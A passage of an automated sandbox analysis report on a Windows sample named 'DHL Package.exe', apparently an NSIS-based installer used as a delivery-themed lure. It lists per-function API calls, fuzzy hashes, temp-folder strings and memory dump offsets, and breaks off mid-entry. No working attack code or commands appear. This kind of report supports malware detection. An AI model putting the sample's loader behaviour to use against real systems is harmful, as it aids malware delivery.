Opcode Fuzzy Hash: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
Instruction Fuzzy Hash: F7014470640209BBEF209F60DE4AFEA3B79FB44345F008039FA06A51D1DBB989559F5C

Function 6CA725B5 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6CA7121B: GlobalAlloc.KERNELBASE(00000040,?,6CA7123B,?,6CA712DF,00000019,6CA711BE,-000000A0), ref: 6CA71225

GlobalFree.KERNEL32(?), ref: 6CA726A3
GlobalFree.KERNEL32(00000000), ref: 6CA726D8

Memory Dump Source

Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true

Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: cfc8da35fdb1bd412d3119ce4f4900b2b3ea2512db2d350d9edc76d3bed31132
Instruction ID: 4f7d6494a165c2abbd9302f0b96d4aa13e5db2f12b5d29109486425e126ea3bf
Opcode Fuzzy Hash: cfc8da35fdb1bd412d3119ce4f4900b2b3ea2512db2d350d9edc76d3bed31132
Instruction Fuzzy Hash: 93319439704212DFDB2A8F64CD9CCAA77B6FB87304714862AF20187A51C735988ADF71

Function 00402947 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
GlobalFree.KERNEL32(?), ref: 004029F0
GlobalFree.KERNEL32(00000000), ref: 00402A03
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: fd7dbd5d37358c1cc163e2b69e48bc419add7a24fb657e083e5c8dbb9c2d7a53
Instruction ID: ed14628ef15dceb457173a83ab12e15034626edc11f01d0ebe9f464a1ada349c
Opcode Fuzzy Hash: fd7dbd5d37358c1cc163e2b69e48bc419add7a24fb657e083e5c8dbb9c2d7a53
Instruction Fuzzy Hash: A821C171800128BBCF216FA5DE49D9F7E79EF05364F20023AF564762E1CB794D419BA8

Function 6CA723E0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6CA72522

Part of subcall function 6CA7122C: lstrcpynW.KERNEL32(00000000,?,6CA712DF,00000019,6CA711BE,-000000A0), ref: 6CA7123C

GlobalAlloc.KERNEL32(00000040), ref: 6CA724A8
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6CA724C3

Memory Dump Source

Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true

Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 277f8ab8c4de6faff57f8f3ddf30bbb990f6bee4c057fb935c7a84e7aad047d0
Instruction ID: 0145818afbd804155f4e2f5b184ebb3d205a9e405a2e28fc657415facc6e656c
Opcode Fuzzy Hash: 277f8ab8c4de6faff57f8f3ddf30bbb990f6bee4c057fb935c7a84e7aad047d0
Instruction Fuzzy Hash: 4441E2F8108305EFC738DF64C858A6677F8FB49304F008A2DE54A87A81D734A58ACB71

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
Instruction ID: 4c6ae9b1abf83e60acb3738700a7a9d8e0f5f354904a09afb896d410ef8a521a
Opcode Fuzzy Hash: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
Instruction Fuzzy Hash: CE212672A00119AFCB05CFA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98

Function 6CA7161D Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6CA72238,?,00000808), ref: 6CA71635
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6CA72238,?,00000808), ref: 6CA7163C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6CA72238,?,00000808), ref: 6CA71650
GetProcAddress.KERNEL32(6CA72238,00000000), ref: 6CA71657
GlobalFree.KERNEL32(00000000), ref: 6CA71660

Memory Dump Source

Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true

Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 3eab3020f2634439a8a7f4b13bd809008b04a146ede367ea2ca02809a8c3706e
Instruction ID: 2ef8da6386c4866cefe20c3cef5f6b3386a44ba0db82986356f623de0ff79eb6
Opcode Fuzzy Hash: 3eab3020f2634439a8a7f4b13bd809008b04a146ede367ea2ca02809a8c3706e
Instruction Fuzzy Hash: 16F01C762062397BDA2116A68C4CC9BBEACEF8B2F5B114211F628921A086654C03DBF1

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
Instruction ID: dd4700ba4ce2c01fdcac70281bc34cd4026078c78447772ebe71ed50cab348e7
Opcode Fuzzy Hash: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
Instruction Fuzzy Hash: 3C21AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8

Function 00404BDE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
wsprintfW.USER32 ref: 00404C88
SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B

Strings

%u.%u%s%s, xrefs: 00404C69

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 834fd4594fd84455a21b844807ea957d96961a2cd877ff6e353b70df3a826163
Instruction ID: 7c0a82a5d8c5e130c70e624adf1be80dcdc0ad06cf4f4d66f209f919317c7709
Opcode Fuzzy Hash: 834fd4594fd84455a21b844807ea957d96961a2cd877ff6e353b70df3a826163
Instruction Fuzzy Hash: 9B11D5736041283BEB00666D9C45EDE3298DBC5334F264237FA26F61D1E978CC2286E8

Function 00405CB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405CB6
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405CC0
lstrcatW.KERNEL32(?,0040A014), ref: 00405CD2

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CB0

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
Instruction ID: ab420094dca872cde134391ad8eb9d2612fe0bdf2854729f0df44d947378a899
Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
Instruction Fuzzy Hash: 0FD0A771101A30AAC1116B499D04DEF72ACEE85304741003FF641B30A0CB7C5D5297FD

Function 00402636 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll), ref: 0040268D

Strings

C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll, xrefs: 00402651, 00402676, 00402688, 004026D4
C:\Users\user\AppData\Local\Temp\nsl98D6.tmp, xrefs: 0040267B

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp$C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll
API String ID: 1659193697-888978176
Opcode ID: 1aa389ca015f2fdce485474ac031c077b765c667c8b0e0131096f0f56d463f70
Instruction ID: 875d7668fd04ab2c3476ce7c04c1792ac9cb57cc586ecbb2cfc4c12127aa1763
Opcode Fuzzy Hash: 1aa389ca015f2fdce485474ac031c077b765c667c8b0e0131096f0f56d463f70
Instruction Fuzzy Hash: A8110D71A10205ABCB00AFB18E4E99E7771DF55744F61443FF402F61C1E6FD8851565E

Function 00402FB1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
GetTickCount.KERNEL32 ref: 00402FE2
CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
Instruction ID: cb146776896af08e1a0fdef995d2a06b2a54ad4518ff1494983f568d8b9f1051
Opcode Fuzzy Hash: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
Instruction Fuzzy Hash: 52F05E31606621EBC6716F10FE0CA8B7BA5FB44B42B52487AF441B11E5D7B608829BAD

Function 00405DB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8

Part of subcall function 00405D5B: CharNextW.USER32(?,?,00425F10,?,00405DCF,00425F10,00425F10,77163420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,77163420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D69
Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D6E
Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D86

lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,77163420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,77163420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E11
GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,77163420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,77163420,C:\Users\user\AppData\Local\Temp\), ref: 00405E21

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405DB8

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3355392842
Opcode ID: f78802c74069857e26c972368cced64b80d0155069d2bb9ab6be860a9edbe6e7
Instruction ID: 2671ab18330f60560c3719f84a1496f0714d5bb9fce48f62cd6cce0e1185a57b
Opcode Fuzzy Hash: f78802c74069857e26c972368cced64b80d0155069d2bb9ab6be860a9edbe6e7
Instruction Fuzzy Hash: FAF0F935108E6156D621333A6D0D6AF2504CE82364756853FFC52B12D5DF3C89539DBE

Function 004053B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053E6
CallWindowProcW.USER32(?,?,?,?), ref: 00405437

Part of subcall function 0040437D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F

Strings

, xrefs: 004053C7

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
Instruction ID: da482bbf0ee2bc432bcdf1377e528ba943c285c76ef4d04d2afca056141c401e
Opcode Fuzzy Hash: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
Instruction Fuzzy Hash: 4E01B131200608ABDF314F11ED81B9B3629EB84752F608037FA01752D1C7798DD29E69

Function 00403A15 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,77163420,00000000,C:\Users\user\AppData\Local\Temp\,004039ED,00403803,00000007,?,00000007,00000009,0000000B), ref: 00403A2F
GlobalFree.KERNEL32(?), ref: 00403A36

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403A15

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction ID: e31a7033e06264a748858091d27326a34299cb79b9d6c3cb96cb008d14d5ef43
Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
Instruction Fuzzy Hash: 53E0EC36A511205BC7219F45AA0875E7BADAF58B22F05012AE8857B27087745C824F98

Function 00405CFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL Package.exe,C:\Users\user\Desktop\DHL Package.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D02
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL Package.exe,C:\Users\user\Desktop\DHL Package.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D12

Strings

C:\Users\user\Desktop, xrefs: 00405CFC

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
Instruction ID: 6b3ae82466a78d2b10de00fa1d507c540e6bf26c2d05194e9d44ea340b0cb8a4
Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
Instruction Fuzzy Hash: 48D05EB24109209AC3126705EC089AF67A8EF5130074A842BF841A61A5D7785C8186AC

Function 6CA710E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

